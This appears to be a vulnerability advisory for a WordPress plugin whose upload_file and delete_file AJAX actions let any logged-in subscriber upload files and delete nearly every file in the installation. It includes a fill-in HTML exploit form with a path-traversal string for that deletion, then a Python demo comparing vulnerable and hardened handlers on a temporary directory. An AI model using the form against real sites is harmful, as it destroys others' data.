Affected AJAX actions: upload_file and delete_file. To get the nonce, search for uploader_nonce in the dashboard.
The following actions can be triggered by any authenticated user; all of them were verified with a subscriber account.
1. Restricted file upload (for example an HTML file, using the form below).
2. File deletion via the upload process
The upload function contains a bug that allows deleting every file (excluding directories and files with a leading dot) which the executing user (in my case www-data) is permitted to delete. This can be used to delete nearly a whole WordPress installation; only the empty directory structure remains.
3. Direct file deletion
The delete_file function can be used to obtain the same result as described in 2.
You can use the following HTML form (fill in the host, the nonce and the post_id before submitting):
<form action="<your host here>/wp-admin/admin-ajax.php" method="post" enctype="multipart/form-data">
<!-- which AJAX action to call: upload_file or delete_file -->
<input type="text" name="action" value="" placeholder="upload_file or delete_file">
<!-- the nonce taken from uploader_nonce in the dashboard -->
<input type="text" name="nonce" value="" placeholder="your nonce here">
<!-- post_id is used to create the directory in which the uploaded file is stored. -->
<!-- Do not use it for path traversal if you want the upload itself to succeed. -->
<!-- To wipe nearly the entire installation use e.g. ../../../../../../../../../../ -->
<input type="text" name="post_id" value="" placeholder="">
<!-- the file to upload, e.g. your HTML file -->
<input type="file" name="file-upload" value="upload">
<!-- the following element is used for the delete_file function call. -->
<!-- before unlink is called a file_exists check is performed. -->
<input type="text" name="filename" placeholder="valid target file">
<input type="submit" value="submit">
</form>
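The following Python script is an added example, not the plugin's code or the original author's: it models the behaviour described in findings 2 and 3 (post_id joined onto the uploads directory unchecked, then the files in that directory removed; filename passed to file_exists/unlink unchecked) as hypothetical handlers, places a hardened pair beside them that rejects a non-numeric post_id and confines every resolved path to the uploads root, and runs both against a constructed throwaway directory tree. All function names, the directory layout and the sample files are assumptions made for the demonstration.

```python
import os
import re
import shutil
import tempfile


def _wipe_regular_files(target_dir):
    """Delete every regular file directly inside target_dir, skipping subdirectories
    and dot-files. Assumed model of the clean-up step the advisory describes for
    the upload handler; not the plugin's own code."""
    deleted = []
    for name in sorted(os.listdir(target_dir)):
        path = os.path.join(target_dir, name)
        if name.startswith(".") or os.path.isdir(path):
            continue
        os.unlink(path)
        deleted.append(name)
    return deleted


def vulnerable_upload_file(uploads_root, post_id):
    """Hypothetical vulnerable upload_file: post_id is joined onto the uploads
    directory unchecked, so a post_id of ../.. walks up to the WordPress root and
    the clean-up wipes the files there. The advisory notes the upload itself does
    not succeed with a traversal, so only the deletion step is modelled."""
    target_dir = os.path.join(uploads_root, str(post_id))
    os.makedirs(target_dir, exist_ok=True)
    return _wipe_regular_files(target_dir)


def vulnerable_delete_file(uploads_root, filename):
    """Hypothetical vulnerable delete_file: file_exists check, then unlink, on a
    path the caller controls completely (traversal in filename is not rejected)."""
    path = os.path.join(uploads_root, filename)
    if os.path.isfile(path):
        os.unlink(path)
        return True
    return False


POST_ID_RE = re.compile(r"^[1-9][0-9]*$")


def _confined_path(root, *parts):
    """Join parts onto root and refuse any result that resolves outside root.
    realpath also collapses symlinks, so a symlinked directory cannot escape."""
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, *parts))
    if candidate != root_real and not candidate.startswith(root_real + os.sep):
        raise ValueError("path escapes %s: %r" % (root_real, parts))
    return candidate


def hardened_upload_file(uploads_root, post_id, filename, data):
    """Hardened upload_file: post_id must be a plain positive integer, the target
    directory is confined to the uploads root, and only the basename is stored."""
    if not POST_ID_RE.match(str(post_id)):
        raise ValueError("post_id must be a positive integer")
    target_dir = _confined_path(uploads_root, str(post_id))
    os.makedirs(target_dir, exist_ok=True)
    _wipe_regular_files(target_dir)  # same clean-up, now confined to the post's directory
    safe_name = os.path.basename(filename)
    if not safe_name or safe_name.startswith("."):
        raise ValueError("invalid filename")
    dest = os.path.join(target_dir, safe_name)
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def hardened_delete_file(uploads_root, post_id, filename):
    """Hardened delete_file: the same checks, so only a file inside the post's
    own upload directory can be removed."""
    if not POST_ID_RE.match(str(post_id)):
        raise ValueError("post_id must be a positive integer")
    path = _confined_path(uploads_root, str(post_id), os.path.basename(filename))
    if os.path.isfile(path):
        os.unlink(path)
        return True
    return False


def demo():
    """Build a throwaway install-like tree (constructed sample data), run the
    vulnerable and hardened handlers with a traversal and report what happened."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    for rel in ("wp-config.php", "index.php", ".htaccess", "wp-content/uploads/keep.txt"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("x")
    traversal = "../.."  # uploads -> wp-content -> WordPress root
    result = {}
    result["delete_index"] = vulnerable_delete_file(uploads, "../../index.php")
    result["vuln_deleted"] = vulnerable_upload_file(uploads, traversal)
    result["survivors"] = sorted(os.listdir(root))  # dot-file and directory remain
    try:
        hardened_upload_file(uploads, traversal, "x.html", b"<b>hi</b>")
        result["hardened_rejected"] = False
    except ValueError:
        result["hardened_rejected"] = True
    result["stored"] = hardened_upload_file(uploads, 42, "../../x.html", b"<b>hi</b>")
    result["keep_survives"] = os.path.isfile(os.path.join(uploads, "keep.txt"))
    result["hardened_delete_ok"] = hardened_delete_file(uploads, 42, "x.html")
    shutil.rmtree(root)
    return result


if __name__ == "__main__":
    print(demo())
```

The vulnerable pair reproduces the advisory's outcome on the sample tree: wp-config.php and index.php are gone, while .htaccess and the wp-content directory survive. The hardened pair rejects the traversal before touching the filesystem and still performs the per-post clean-up, now confined to uploads/42.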